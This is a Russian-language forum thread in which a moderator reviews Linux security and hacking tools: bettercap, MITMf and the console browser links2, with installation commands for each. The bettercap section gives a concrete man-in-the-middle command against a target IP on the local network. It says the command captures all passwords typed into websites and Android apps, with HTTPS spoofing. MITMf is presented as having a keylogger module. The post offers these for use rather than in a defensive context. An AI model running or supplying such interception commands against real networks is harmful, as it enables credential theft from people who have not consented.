Обзор софта безопасности и взлома под линукс

Обсуждение программного обеспечения под Linux в разрезе информационной безопасности

Модератор: phantom

Ответить

Автор темы
phantom
Модератор
Модератор
Сообщения: 62
Зарегистрирован: 09 сен 2016, 12:43
Репутация: 12
Статус: Не в сети

Обзор софта безопасности и взлома под линукс

Сообщение phantom » 12 сен 2016, 16:00


Здравствуйте, хотел бы продолжить тему обзора софта, входящего в состав линукс дистрибутивов в составе кали, паррот. Не знаю пока как объеденить их в общую тему, надеюсь модераторы помогут)
Сегодня хочу осветить один из очень мощных инструментов - BETTERCAP
он предустановлен по умолчанию в PARROT SECURITY OS сайт проекта- https://www.parrotsec.org/
в последнем дистрибутиве кали линукс устанавливается командой в терминале-
# apt-get update
# apt-get install bettercap

итак, установили.. инструмент пришел на замену легендарного ettercap и включает в себя гораздо больше возможностей. официальный гит хаб проекта можно найти по адресу https://github.com/evilsocket/bettercap
программа действительно заслуживает внимания и являестся мощным инструментом для атак MITMF включающей в себя множество скриптов для разного рода атак. один ( пока) из примеров -
# bettercap -T (ip адрес цели в локальной сети при условии, что вы к ней подключены) --proxy -P POST

получаете на выходе перехват всех паролей вводимых на сайтах с авторизацией, включая андроид приложения. Имеет место подмена HTTPS и как следствие получаем данные. пример конкретный- адрес цели в локальной сети- 192.168.0.125 соответственно команда перехвата будет выглядеть следующим образом-
# bettercap -T 192.168.0.125 --proxy -P POST

продолжение следует....

Отправлено спустя 19 минут 35 секунд:
установка в UBUNTU 16.04
# sudo apt-get install build-essential ruby-dev libpcap-dev
# gem install bettercap

обращаю внимание- программа требует прав рут, соответственно запускаем от имени суперпользователя

$ sudo su bettercap

или

$ su
вводим пароль суперпользователя и далее

# bettercap

Отправлено спустя 1 час 12 минут 39 секунд:
Еще один проект, не менее заслуживающий внимания. Отличается от BETTERCAP наличием модулей кейлогер и многих других. установлен по умолчанию в паррот ос. в последней кали не проверял пока
встречаем MITMF
установлен в пваррот
установка в ubuntu 16.04 (jroot)

# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
# pip install virtualenvwrapper
# git clone https://github.com/byt3bl33d3r/MITMf
# cd MITMf && git submodule init && git submodule update --recursive
# pip install -r requirements.txt

после всех манимуляций в домашней дирректории появится папка MITMf
заходим в нее командой

# cd MITMf

запускаем программу
# ./mitmf.py

описание позже...


Автор темы
phantom
Модератор
Модератор
Сообщения: 62
Зарегистрирован: 09 сен 2016, 12:43
Репутация: 12
Статус: Не в сети

Обзор софта безопасности и взлома под линукс

Сообщение phantom » 13 сен 2016, 10:22


Еще одна довольно хорошая программка LINKS2
довольно шустрый консольный браузер с кучей настроек и способный отображать картинки на страницах, поддерживает так же загрузки файлов. практически не расходует ресурсы системы в отличии от прожорливых собратьев
установка-

# apt-get install links2

запускается командой

# links2
Вложения
Screenshot_2016-09-13_10-06-15.png